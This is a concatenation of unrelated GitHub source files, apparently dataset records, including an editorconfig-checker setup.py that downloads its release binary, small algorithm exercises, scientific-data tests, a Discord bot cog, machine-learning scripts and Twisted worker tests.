directly in the setup phase.\n\nDuring setup, the tarball that contains the executable will be downloaded based on\nthe target machine and its content extracted in the proper output directory.\n\nOnce the setup is complete, the `ec` executable should be available on your machine.\n\"\"\"\n\nfrom distutils.command.build import build as orig_build\nfrom distutils.core import Command\nfrom io import BytesIO\nfrom os import chmod, makedirs, path, stat\nfrom platform import architecture, machine, system\nfrom stat import S_IXGRP, S_IXOTH, S_IXUSR\nfrom tarfile import open as tarfile_open\n\nfrom setuptools import setup\nfrom setuptools.command.install import install as orig_install\n\ntry:\n # Python 3\n from urllib.request import urlopen\nexcept 
ImportError:\n # Python 2.7\n from urllib2 import urlopen\n\n\nWRAPPER_VERSION = '2.7.3'\nEDITORCONFIG_CHECKER_CORE_VERSION = '2.7.2'\nEDITORCONFIG_CHECKER_EXE_NAME = 'ec'\n\n\ndef get_tarball_url():\n def get_ec_name_by_system():\n # Platform architecture() system() machine()\n # ---------------------------------------------------------------\n # Linux x86 64bit ('64bit', 'ELF') 'Linux' 'x86_64'\n # Linux AWS Graviton2 ('64bit', 'ELF') 'Linux' 'aarch64'\n # Mac x86 64bit ('64bit', '') 'Darwin' 'x86_64'\n # Mac M1 64bit ('64bit', '') 'Darwin' 'arm64'\n _system = system()\n _machine = machine()\n if _machine == 'x86_64':\n _architecture = 'amd64'\n elif _machine == 'aarch64' or _machine == 'arm64':\n _architecture = 'arm64'\n elif isinstance(architecture(), tuple) and len(architecture()) > 0:\n _architecture = 'amd64' if architecture()[0] == '64bit' else '386'\n else:\n raise ValueError('Cannot determine architecture')\n\n # The core, from `2.7.0`, introduces the extension in the tarball name\n # (e.g. `ec-windows-386.exe.tar.gz`, `ec-windows-arm.exe.tar.gz`)\n _ext = '.exe' if _system == 'Windows' else ''\n\n return 'ec-{}-{}{}'.format(\n _system.lower(),\n _architecture,\n _ext,\n )\n\n return 'https://github.com/editorconfig-checker/editorconfig-checker/releases/download/{}/{}.tar.gz'.format(\n EDITORCONFIG_CHECKER_CORE_VERSION,\n get_ec_name_by_system(),\n )\n\n\ndef download_tarball(url):\n sock = urlopen(url)\n code = sock.getcode()\n\n if code != 200:\n sock.close()\n raise ValueError('HTTP failure. Code: {}'.format(code))\n\n data = sock.read()\n sock.close()\n\n return data\n\n\ndef extract_tarball(url, data):\n with BytesIO(data) as bio:\n if '.tar.' in url:\n with tarfile_open(fileobj=bio) as fp:\n for info in fp.getmembers():\n if info.isfile() and info.name.startswith('bin/ec-'):\n return fp.extractfile(info).read()\n\n raise AssertionError('unreachable `extract` function')\n\n\ndef save_executables(data, base_dir):\n exe = EDITORCONFIG_CHECKER_EXE_NAME\n if system() == 'Windows':\n exe += '.exe'\n\n output_path = path.join(base_dir, exe)\n try:\n # Python 3\n makedirs(base_dir, exist_ok=True)\n except TypeError:\n # Python 2.7\n makedirs(base_dir)\n\n with open(output_path, 'wb') as fp:\n fp.write(data)\n\n # Mark as executable ~ https://stackoverflow.com/a/14105527\n mode = stat(output_path).st_mode\n mode |= S_IXUSR | S_IXGRP | S_IXOTH\n chmod(output_path, mode)\n\n\nclass build(orig_build):\n sub_commands = orig_build.sub_commands + [('fetch_binaries', None)]\n\n\nclass install(orig_install):\n sub_commands = orig_install.sub_commands + [('install_editorconfig_checker', None)]\n\n\nclass fetch_binaries(Command):\n build_temp = None\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n self.set_undefined_options('build', ('build_temp', 'build_temp'))\n\n def run(self):\n # save binary to self.build_temp\n url = get_tarball_url()\n archive = download_tarball(url)\n data = extract_tarball(url, archive)\n save_executables(data, self.build_temp)\n\n\nclass install_editorconfig_checker(Command):\n description = 'install the editorconfig-checker executable'\n outfiles = ()\n build_dir = install_dir = None\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n # this initializes attributes based on other commands' attributes\n self.set_undefined_options('build', ('build_temp', 'build_dir'))\n self.set_undefined_options('install', ('install_scripts', 'install_dir'))\n\n def run(self):\n self.outfiles = self.copy_tree(self.build_dir, 
self.install_dir)\n\n def get_outputs(self):\n return self.outfiles\n\n\ncommand_overrides = {\n 'install': install,\n 'install_editorconfig_checker': install_editorconfig_checker,\n 'build': build,\n 'fetch_binaries': fetch_binaries,\n}\n\n\ntry:\n from wheel.bdist_wheel import bdist_wheel as orig_bdist_wheel\nexcept ImportError:\n pass\nelse:\n class bdist_wheel(orig_bdist_wheel):\n def finalize_options(self):\n orig_bdist_wheel.finalize_options(self)\n # Mark us as not a pure python package\n self.root_is_pure = False\n\n def get_tag(self):\n _, _, plat = orig_bdist_wheel.get_tag(self)\n # We don't contain any python source, nor any python extensions\n return 'py2.py3', 'none', plat\n\n command_overrides['bdist_wheel'] = bdist_wheel\n\n\nsetup(version=WRAPPER_VERSION, cmdclass=command_overrides)\n","repo_name":"editorconfig-checker/editorconfig-checker.python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5935,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"78"} +{"seq_id":"13093601322","text":"#\n# @lc app=leetcode id=278 lang=python3\n#\n# [278] First Bad Version\n#\n\n# @lc code=start\n# The isBadVersion API is already defined for you.\n# @param version, an integer\n# @return an integer\n# def isBadVersion(version):\n\nclass Solution:\n def firstBadVersion(self, n):\n \"\"\"\n returns the first bad version of a release\n Runtime:O(n log(n)))\n Space:O(1)\n :type n: int\n :rtype: int\n \"\"\"\n\n lo,hi = 0, n\n while lo <= hi:\n mid = lo + (hi - lo)//2\n if(isBadVersion(mid)):\n hi = mid -1\n else:\n lo = mid+1\n return lo\n \n# @lc code=end\n\n","repo_name":"SegFault2017/LeetCode2021-2022","sub_path":"python/278.first-bad-version.py","file_name":"278.first-bad-version.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2450392918","text":"#Our convention is that the next tail link is the head, and the previous head link is the tail\n#Another condition that pop is the transfer of the head to the end of the queue (to the tail)\n\n####################This is a circular queue########################\n\nclass Queue:\n\n head = None #creating a head and tail for convenience\n tail = None\n\n class Node:\n value = None\n next = None # Initialize the value, the reference to the next element and the previous one\n prev = None\n def __init__(self,value, next = None, prev = None):\n self.value = value\n self.next = next\n self.prev = None\n\n def push(self, value): \n if self.head is None: #If the queue is empty, then add the first element - the head and tail of the queue\n self.head = self.tail = self.Node(value)\n return\n self.tail.next = self.Node(value)\n self.tail.next.prev = self.tail #If we already have items in the queue, then we shift the tail and add\n self.tail = self.tail.next\n\n def pop(self):\n if self.head is None: #if there are no items in the queue, then we output an error\n print(\"Queue is empty!\")\n return\n if self.head.next is None: # If there is one item in the queue, then we do nothing\n return\n current = self.head\n self.head = self.head.next #This is my implementation of the transfer\n self.tail.next = current\n current.prev = self.tail\n self.tail = current\n self.tail.next = None\n \n def get(self,index):\n self.head.prev = self.tail # This is our main condition\n self.tail.next = self.head # This is our main condition\n\n if index == 0:\n print(self.head.value) # if the index is 0 
then we return the head\n return\n if index > 0:\n counter = 0\n current = self.head # If the index is positive, then we start from the head and go counterclockwise\n while counter < index:\n current = current.next \n counter += 1\n print(current.value)\n return\n if index < 0:\n counter = 0\n current = self.tail\n while counter > index: # If the index is negative , then we start from the tail and go clockwise\n current = current.prev\n index += 1\n print(current.value)\n return\n def out(self):\n if self.head is None:\n print(\"Queue is empty\")\n return\n current = self.head\n while current.next != self.head: # We output the values until we meet the head again\n print(current.value, end = \" \")\n current = current.next\n print(current.value)\n\n# This is Simple CircularQueue (TEST) \n \nlist = Queue()\nlist.push(12)\nlist.push(-334)\nlist.push(313)\nlist.pop()\nlist.get(12)\nlist.get(0)\nlist.out()\n","repo_name":"ToiletHead/SimpleAlgorithms","sub_path":"Structures/CircularQueue.py","file_name":"CircularQueue.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42004933151","text":"rows, cols = [int(x) for x in input().split()]\n\nmatrix = []\n\nfor row in range(rows):\n matrix.append([])\n for col in range(cols):\n first_letter = chr(row + 97)\n middle_letter = chr(row + col+ 97)\n matrix[-1].append(f\"{first_letter}{middle_letter}{first_letter}\")\nprint(\"\\n\".join(\" \".join([str(el) for el in row]) for row in matrix))\n","repo_name":"milenpenev/Python_Advanced","sub_path":"Comprehensions/06. Matrix of Palindromes.py","file_name":"06. Matrix of Palindromes.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27259945498","text":"# -*- coding: utf-8 -*-\n\nimport os\n\nimport pytest\nfrom numpy.testing import assert_array_almost_equal\n\nimport pysteps\n\npytest.importorskip(\"pygrib\")\n\n\ndef test_io_import_mrms_grib():\n \"\"\"Test the importer for NSSL data.\"\"\"\n\n root_path = pysteps.rcparams.data_sources[\"mrms\"][\"root_path\"]\n\n filename = os.path.join(\n root_path, \"2019/06/10/\", \"PrecipRate_00.00_20190610-000000.grib2\"\n )\n\n precip_full, _, metadata = pysteps.io.import_mrms_grib(\n filename, fillna=0, window_size=1\n )\n assert precip_full.shape == (3500, 7000)\n assert precip_full.dtype == \"single\"\n\n expected_metadata = dict(\n xpixelsize=0.01,\n ypixelsize=0.01,\n unit=\"mm/h\",\n transform=None,\n zerovalue=0,\n yorigin=\"upper\",\n )\n for key in expected_metadata.keys():\n assert metadata[key] == expected_metadata[key]\n\n # The full latitude range is (20.005, 54.995)\n # The full longitude range is (230.005, 299.995)\n\n # Test that if the bounding box is larger than the domain, all the points are returned.\n precip_full2 = pysteps.io.import_mrms_grib(\n filename, fillna=0, extent=(220, 300, 20, 55), window_size=1\n )[0]\n assert precip_full2.shape == (3500, 7000)\n\n assert_array_almost_equal(precip_full, precip_full2)\n\n del precip_full2\n\n # Test that a portion of the domain is returned correctly\n precip_clipped = pysteps.io.import_mrms_grib(\n filename, fillna=0, extent=(250, 260, 30, 35), window_size=1\n )[0]\n\n assert precip_clipped.shape == (500, 1000)\n assert_array_almost_equal(precip_clipped, precip_full[2000:2500, 2000:3000])\n del precip_clipped\n\n precip_single = pysteps.io.import_mrms_grib(filename, dtype=\"double\", fillna=0)[0]\n 
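The `CircularQueue` record above hand-rolls a doubly linked ring; `collections.deque` gives equivalent behaviour with far less code — `rotate(-1)` reproduces the "pop moves the head to the tail" trick, and modular indexing covers the wrap-around `get`. A minimal sketch, not a drop-in replacement for that class:

```python
from collections import deque

ring = deque([12, -334, 313])
ring.rotate(-1)               # like pop(): old head 12 moves to the tail
print(ring)                   # deque([-334, 313, 12])
print(ring[0], ring[-1])      # head and tail: -334 12
print(ring[12 % len(ring)])   # wraps a large index the way get(12) walks the ring
```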
assert precip_single.dtype == \"double\"\n del precip_single\n\n precip_single = pysteps.io.import_mrms_grib(filename, dtype=\"single\", fillna=0)[0]\n assert precip_single.dtype == \"single\"\n del precip_single\n\n precip_donwscaled = pysteps.io.import_mrms_grib(\n filename, dtype=\"single\", fillna=0, window_size=2\n )[0]\n assert precip_donwscaled.shape == (3500 / 2, 7000 / 2)\n\n precip_donwscaled, _, metadata = pysteps.io.import_mrms_grib(\n filename, dtype=\"single\", fillna=0, window_size=3\n )\n expected_metadata = dict(\n xpixelsize=0.03,\n ypixelsize=0.03,\n unit=\"mm/h\",\n transform=None,\n zerovalue=0,\n yorigin=\"upper\",\n )\n for key in expected_metadata.keys():\n assert metadata[key] == expected_metadata[key]\n assert precip_donwscaled.shape == (3500 // 3, 7000 // 3)\n","repo_name":"chrimerss/EnsembleNowcast","sub_path":"pysteps-1.3.2/pysteps/tests/test_io_mrms_grib.py","file_name":"test_io_mrms_grib.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9901423988","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport cms.models.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('applications', '0006_service_name'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='service',\n name='name',\n field=cms.models.fields.PlaceholderField(editable=False, slotname='icon', related_name='service_name', null=True, to='cms.Placeholder'),\n preserve_default=True,\n ),\n ]\n","repo_name":"jonthdiaz/digital-works","sub_path":"applications/migrations/0007_auto_20150412_2150.py","file_name":"0007_auto_20150412_2150.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40287674744","text":"import discord \r\nfrom discord.ext import commands\r\nfrom discord.ext.commands.cooldowns import BucketType\r\n\r\nclass Meta(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n self.help_message = discord.Embed(\r\n description=\"**Reaction Poll**\\nCreate a reaction poll with multiple options by typing `+poll {title} [Option1] [Option2] [Option3]`.\",\r\n colour=0x83BAE3,\r\n )\r\n\r\n @commands.command(name=\"help\")\r\n @commands.cooldown(2,60,BucketType.user) \r\n async def help(self, ctx):\r\n await ctx.message.channel.send(embed=self.help_message)\r\n\r\ndef setup(bot):\r\n bot.add_cog(Meta(bot))\r\n","repo_name":"Shrey2809/Discord-Prediction-Bot","sub_path":"cogs/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40367890610","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 13 11:55:58 2018\n\n@author: Diego\n\"\"\"\n\nimport csv\nimport numpy as np\nimport datetime\nfrom dateutil.relativedelta import relativedelta\n\nfrom utils.dataclass import Quality, RD, Sex, Laterality\n\n# Load Data\npath = 'C:/Users/Diego/Dropbox/INESC/SCREEN-DR/Data/Tables/'\ncsv_file = 'BigTable.csv';\n# Read CSV\nbigtable = []\nwith open(path + csv_file) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=';')\n for row in readCSV:\n bigtable.append(row)\n\nheader = bigtable[0]\neye_data = bigtable[1:]\n# Prepare data \nparams = []\ngrading = []\nfor data in eye_data:\n \n rid = data[0] # id\n \n if Quality.BAD != Quality[data[18]]:\n # Age\n acq_date = 
data[3] # acquisition_datetime\n acq_date = datetime.date(int(acq_date[:4]), int(acq_date[5:7]), int(acq_date[8:10]))\n birth = data[13] # patient_birthdate\n birth = datetime.date(int(birth[:4]), int(birth[5:7]), int(birth[8:10]))\n age = relativedelta(acq_date, birth).years\n \n lat = Laterality[data[5]].value # laterality\n sex = Sex[data[12]].value # patient_sex\n \n # Append parameters \n params.append([rid, age, lat, sex])\n \n # Grading\n str_rd = data[21]\n str_rd = str_rd[:2]\n rd_grad = RD[str_rd].value # retinopathy\n grading.append(rd_grad)\n \nparams = np.array(params)\nparams.astype(int) \n\n\n'''\nPlot Data\n'''\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\ncolors = ['w', 'b', 'g', 'r', 'y']\nfor k in range(len(grading)):\n \n color = colors[grading[k]]\n ax.scatter(params[k,1].astype(int),\n params[k,2].astype(int),\n params[k,3].astype(int),\n c=color, marker='o')\n\nax.set_xlabel('Age')\nax.set_ylabel('Laterality')\nax.set_zlabel('Sex')\n\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"dswanderley/data_clustering","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40745606962","text":"## Program to take rows and columns within values less than 500\n\nele = []\nfilelink = open(\"D:\\Btech\\SEM5\\Design and Analysis of Algorithms\\Project\\Data-Structures-and-Algorithms\\Graph based Email suggestion\\Email-EuAll.txt\",\"r\")\n#V = len(filelink.readlines())\nV = 420045\nfile_line = filelink.readline()\n# use the readline() method to read further.\n# If the file is not empty keep reading one line at a time, till the file is empty\nwhile file_line:\n #str.split() method is used split the string into a list of strings.\n numlist = [int(ele) for ele in file_line.split('\\t')]\n ele.append([numlist[0],numlist[1]])\n #print(numlist)\n #use realine() to read next line\n file_line = filelink.readline()\nfilelink.close()\n\nimport numpy as np\nimport pandas as pd\ndf = pd.DataFrame(ele)\nprint(df.head(10))\ndf.columns = ['src', 'dst']\nprint(df.dtypes)\n\ndf2 = df[(df['src'] < 500)]\ndf3 = df2[(df2['dst'] < 500)]\nprint(len(df2), len(df3))\ndf3.to_csv(\"D:\\Btech\\SEM5\\Design and Analysis of Algorithms\\Project\\Data-Structures-and-Algorithms\\Graph based Email suggestion\\email500.csv\")","repo_name":"dharaneishvc/Data-Structures-and-Algorithms","sub_path":"Graph based Email suggestion/filesampling.py","file_name":"filesampling.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9655576881","text":"from abc import abstractmethod\n\nimport numpy as np\n\n\ndef main():\n print(\"Which learning algorithm do you want to use?\")\n print(\" 1. Linear Regression\")\n print(\" 2. 
k-NN\")\n aType = int(input(\"Enter the number: \"))\n if aType == 1:\n ml = LinearRegression()\n else:\n ml = KNN()\n fileName = input(\"Enter the file name of training data: \")\n ml.setData('train', fileName)\n fileName = input(\"Enter the file name of test data: \")\n ml.setData('test', fileName)\n ml.buildModel()\n ml.testModel()\n ml.report()\n\n\nclass ML:\n def __init__(self):\n self._trainDX = np.array([]) # Feature value matrix (training data)\n self._trainDy = np.array([]) # Target column (training data)\n self._testDX = np.array([]) # Feature value matrix (test data)\n self._testDy = np.array([]) # Target column (test data)\n self._testPy = np.array([]) # Predicted values for test data\n self._rmse = 0 # Root mean squared error\n\n def setData(self, dtype, fileName): # set class variables\n XArray, yArray = self.createMatrices(fileName)\n if dtype == 'train':\n self._trainDX = XArray\n self._trainDy = yArray\n elif dtype == 'test':\n self._testDX = XArray\n self._testDy = yArray\n self._testPy = np.zeros(np.size(yArray)) # Initialize to all 0\n\n def createMatrices(self, fileName): # Read data from file and make arrays\n infile = open(fileName, 'r')\n XSet = []\n ySet = []\n for line in infile:\n data = [float(x) for x in line.split(',')]\n features = data[0:-1]\n target = data[-1]\n XSet.append(features)\n ySet.append(target)\n infile.close()\n XArray = np.array(XSet)\n yArray = np.array(ySet)\n return XArray, yArray\n\n @abstractmethod\n def buildModel(self):\n pass\n\n def testModel(self): # Test model with the test set\n n = np.size(self._testDy)\n for i in range(n):\n self._testPy[i] = self.predict(self._testDX[i])\n\n @abstractmethod\n def predict(self, data):\n pass\n\n def report(self):\n self.calcRMSE()\n print()\n print(\"RMSE: \", round(self._rmse, 2))\n\n def calcRMSE(self):\n n = np.size(self._testDy) # Number of test data\n totalSe = 0\n for i in range(n):\n se = (self._testDy[i] - self._testPy[i]) ** 2\n totalSe += se\n self._rmse = np.sqrt(totalSe / n)\n return self._rmse\n\n\nclass LinearRegression(ML):\n def __init__(self):\n super(LinearRegression, self).__init__()\n self._w = np.array([]) # Optimal weights for linear regression\n\n def buildModel(self):\n self._w = self.linearRegression()\n\n def linearRegression(self): # Do linear regression and return optimal w\n X = self._trainDX\n n = np.size(self._trainDy)\n X0 = np.ones([n, 1])\n nX = np.hstack((X0, X)) # Add a column of all 1's as the first column\n y = self._trainDy\n t_nX = np.transpose(nX)\n return np.dot(np.dot(np.linalg.inv(np.dot(t_nX, nX)), t_nX), y)\n\n def predict(self, data): # Apply linear regression to a test data\n nData = np.insert(data, 0, 1)\n return np.inner(self._w, nData)\n\n\nclass KNN(ML):\n def __init__(self, k=0):\n super(KNN, self).__init__()\n self._k = k # k value for k-NN\n\n def buildModel(self):\n if self._k == 0:\n self._k = int(input(\"Enter the value for k: \"))\n\n ### Implement the following and other necessary methods\n def predict(self, query):\n # 거리 계산\n distance = np.sum((np.array(self._trainDX) - query) ** 2, axis=1)\n pos = [[i, distance[i]] for i in range(len(self._trainDX))]\n # 선택\n pos.sort(key=lambda x: x[1])\n pos = pos[:self._k]\n # 평균\n return np.mean([self._trainDy[it[0]] for it in pos])\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"LeeSeungYun1020/AI_Programming_CB35655","sub_path":"hw/learning_experiments/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23294546627","text":"from twisted.trial.unittest import TestCase\nfrom twisted.internet.defer import (Deferred, DeferredList,\n inlineCallbacks, returnValue)\n\nimport MySQLdb\nfrom pymongo import MongoClient\n\nfrom vumi.multiworker import MultiWorker\nfrom vumi.message import TransportUserMessage\nfrom vumi.tests.utils import StubbedWorkerCreator, get_stubbed_worker\n#from vumi.tests.test_multiworker import ToyWorker\nfrom vumi.tests.helpers import VumiTestCase, WorkerHelper, MessageHelper\nfrom vumi.service import Worker\n\nfrom vusion import VusionMultiWorker, DialogueWorker\nfrom vusion.persist import ProgramManager\n\nfrom tests.utils import MessageMaker, DataLayerUtils\n\n\nclass ToyWorker(Worker):\n events = []\n\n def __init__(self, *args):\n self._d = Deferred()\n return super(ToyWorker, self).__init__(*args)\n\n @inlineCallbacks\n def startWorker(self):\n self.events.append(\"START: %s\" % self.name)\n self.pub = yield self.publish_to(\"%s.outbound\" % self.name)\n yield self.consume(\"%s.inbound\" % self.name, self.process_message,\n message_class=TransportUserMessage)\n self._d.callback(None)\n\n def stopWorker(self):\n self.events.append(\"STOP: %s\" % self.name)\n\n def process_message(self, message):\n return self.pub.publish_message(\n message.reply(''.join(reversed(message['content']))))\n\n\nclass ToyDialogueWorker(DialogueWorker):\n \n def __init__(self, *args):\n self._d = Deferred()\n return super(ToyDialogueWorker, self).__init__(*args)\n \n def setup_application(self):\n super(ToyDialogueWorker, self).setup_application()\n self._d.callback(None)\n\n def teardown_application(self):\n super(ToyDialogueWorker, self).teardown_application()\n\n def before_teardown_application(self):\n super(ToyDialogueWorker, self).before_teardown_application()\n\n\nclass StubbedVusionMultiWorker(VusionMultiWorker):\n\n def WORKER_CREATOR(self, options):\n worker_creator = StubbedWorkerCreator(options)\n worker_creator.broker = self._amqp_client.broker\n return worker_creator\n\n def wait_for_workers(self):\n return DeferredList([w._d for w in self.workers.values()])\n\n\nclass VusionMultiWorkerTestCase(VumiTestCase, MessageMaker):\n timeout = 100\n\n base_config = {\n 'application_name': 'vusion',\n 'vusion_database_name': 'test3',\n 'mongodb_host': 'localhost',\n 'mongodb_port': 27017,\n 'mysql_host': '127.0.0.1',\n 'mysql_port': 3306,\n 'mysql_user': 'cake_test',\n 'mysql_password': 'password',\n 'mysql_db': 'vusion_test',\n 'dispatcher_name': 'dispatcher',\n 'workers': {\n 'worker1': '%s.ToyDialogueWorker' % (__name__,) },\n 'worker1': {\n 'control_name': 'test1',\n 'transport_name': 'test1',\n 'database_name': 'test1'},\n 'defaults': {\n 'mongodb_host': 'localhost',\n 'mongodb_port': 27017,\n 'dispatcher_name': 'dispatcher',\n 'vusion_database_name': 'test3'}\n }\n\n worker1_config = {\n 'control_name': 'test1url',\n 'transport_name': 'test1',\n 'database_name': 'test1',\n }\n\n new_worker_config = {\n 'control_name': 'test2url',\n 'transport_name': 'test2',\n 'database_name': 'test2',\n }\n\n def setUp(self):\n self.worker_helper = self.add_helper(WorkerHelper())\n self.message_helper = self.add_helper(MessageHelper())\n\n self.application_name = self.base_config['application_name']\n\n self.mongo_client 
= MongoClient(w=1)\n self.mysql_client = MySQLdb.connect(\n host='127.0.0.1',\n port=3306,\n user='cake_test',\n passwd='password',\n db='vusion_test')\n self.cleanData()\n\n db = self.mongo_client[self.base_config['vusion_database_name']]\n self.collections = {}\n self.collections['worker_config'] = db['workers']\n\n self.collections['workers'] = ProgramManager(self.mysql_client)\n query = \"\"\"CREATE TABLE programs (name VARCHAR(20), url VARCHAR(20),\"\"\" + \\\n \"\"\"`database` VARCHAR(20), status VARCHAR(20));\"\"\"\n c = self.mysql_client.cursor()\n c.execute(query)\n self.mysql_client.commit()\n c.close()\n\n\n @inlineCallbacks\n def tearDown(self):\n #yield self.worker.teardown_application()\n yield self.worker.stopService()\n yield super(VusionMultiWorkerTestCase, self).tearDown()\n self.cleanData()\n self.mysql_client.close()\n self.mongo_client.close()\n\n def cleanData(self):\n self.mongo_client.drop_database('test1')\n self.mongo_client.drop_database('test2')\n self.mongo_client.drop_database('test3')\n self.mongo_client.drop_database(self.base_config['vusion_database_name'])\n c = self.mysql_client.cursor()\n c.execute(\"\"\"DROP TABLE IF EXISTS programs;\"\"\")\n self.mysql_client.commit()\n c.close()\n\n def dispatch_control(self, control):\n return self.worker_helper.dispatch_raw('.'.join([self.application_name, 'control']), control)\n\n @inlineCallbacks\n def get_multiworker(self, config):\n self.worker = yield self.worker_helper.get_worker(\n StubbedVusionMultiWorker, config, start=True)\n yield self.worker.wait_for_workers()\n returnValue(self.worker)\n\n @inlineCallbacks\n def test_add_remove_workers(self):\n\n yield self.get_multiworker(self.base_config)\n\n self.assertEqual(self.collections['worker_config'].count(), 1)\n\n control = self.mkmsg_multiworker_control(\n message_type='add_worker',\n worker_name='worker2',\n worker_class= '%s.ToyDialogueWorker' % (__name__,),\n config=self.new_worker_config)\n yield self.dispatch_control(control)\n\n yield self.worker.wait_for_workers()\n\n self.assertEqual(self.collections['worker_config'].count(), 2)\n self.assertTrue('worker2' in self.worker.workers)\n\n control = self.mkmsg_multiworker_control(\n message_type='add_worker',\n worker_name='worker2',\n worker_class= '%s.ToyDialogueWorker' % (__name__,),\n config=self.new_worker_config)\n yield self.dispatch_control(control)\n\n #yield self.worker.wait_for_workers()\n\n self.assertEqual(self.collections['worker_config'].count(), 2)\n self.assertTrue('worker2' in self.worker.workers)\n\n control = self.mkmsg_multiworker_control(\n message_type='remove_worker',\n worker_name='worker2')\n yield self.dispatch_control(control)\n\n #yield self.worker.wait_for_workers()\n\n self.assertEqual(self.collections['worker_config'].count(), 1)\n self.assertFalse('worker2' in self.worker.workers)\n \n #yield self.worker.stopService()\n\n @inlineCallbacks\n def test_startup(self):\n #The worker1 class and config store in the database are overwrite\n #by the config file\n self.collections['worker_config'].save({\n 'name': 'worker1',\n 'class': '%s.ToyWorker' % (__name__),\n 'config': self.worker1_config})\n\n self.collections['worker_config'].save({\n 'name': 'worker2',\n 'class': '%s.ToyWorker' % (__name__),\n 'config': self.new_worker_config})\n\n c = self.mysql_client.cursor()\n c.executemany(\n \"\"\"INSERT INTO programs (name, url, status, `database`) \"\"\" + \\\n \"\"\"VALUES (%s,%s,%s,%s);\"\"\",\n [\n ('my program','test2url','running', 'test2')\n ])\n self.mysql_client.commit()\n 
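The test case around this point chains its asynchronous steps with Twisted's `@inlineCallbacks`, where each `yield` waits for a Deferred to fire and `returnValue` hands back the result. A self-contained sketch of that pattern, independent of the Vusion worker classes:

```python
from twisted.internet import reactor, task
from twisted.internet.defer import inlineCallbacks, returnValue

@inlineCallbacks
def delayed_sum(a, b):
    # yield pauses the generator until the Deferred fires (a 0.1 s timer here)
    yield task.deferLater(reactor, 0.1, lambda: None)
    returnValue(a + b)  # becomes the result of the Deferred delayed_sum returns

def main(_reactor):
    d = delayed_sum(2, 3)
    d.addCallback(print)  # prints 5 once the Deferred fires
    return d

task.react(main)  # runs the reactor until the returned Deferred completes
```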
c.close()\n\n yield self.get_multiworker(self.base_config)\n yield self.worker.wait_for_workers()\n\n self.assertEqual(self.collections['worker_config'].count(), 2)\n worker_configs = self.collections['worker_config'].find()\n self.assertEqual(\n worker_configs[0]['class'],\n '%s.ToyDialogueWorker' % (__name__))\n self.assertEqual(worker_configs[0]['model-version'], '2')\n\n self.assertEqual(\n worker_configs[1]['class'],\n '%s.ToyWorker' % (__name__))\n\n self.assertTrue('worker1' in self.worker.workers)\n self.assertTrue(isinstance(self.worker.workers['worker1'],\n DialogueWorker))\n self.assertTrue('worker2' in self.worker.workers)\n self.assertTrue(isinstance(self.worker.workers['worker2'],\n ToyWorker))\n","repo_name":"texttochange/vusion-backend","sub_path":"vusion/tests/test_multiworker.py","file_name":"test_multiworker.py","file_ext":"py","file_size_in_byte":8667,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"39931602138","text":"import os\nimport logging\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n# logging.basicConfig(level = logging.INFO,format = '%(asctime)s -%(levelname)s:%(message)s')\t#配置信息\n\ndir = os.path.dirname(__file__)\nhandler = logging.FileHandler(r\"{}/log.log\".format(dir),encoding='utf-8')\t#指明文件\nhandler.setLevel(logging.INFO)\t\t\t #设置打印到文件的消息等级\n\nformatter = logging.Formatter('%(asctime)s -%(levelname)s:%(message)s')\nhandler.setFormatter(formatter)\t\t\t #设置打印到文件的配置信息\n\nlogger.addHandler(handler)","repo_name":"Freedomisgood/SeverChan_Nyedu","sub_path":"logfile.py","file_name":"logfile.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74460416893","text":"import requests\nimport time\nimport config\nfrom Scrapers import vuokraoviScraper\n\n\ndef do_scrape():\n data = []\n pages_count = 5\n max_entries_per_page = 5000\n fetch_interval_s = 60\n for page in range(1, pages_count + 1):\n print(f'scraping page {page} with {max_entries_per_page} max entries...')\n new_entries = vuokraoviScraper.scrape_website(page, max_entries_per_page)\n data.extend(new_entries)\n print(f'scraped {len(new_entries)} new entries (total {len(data)}). 
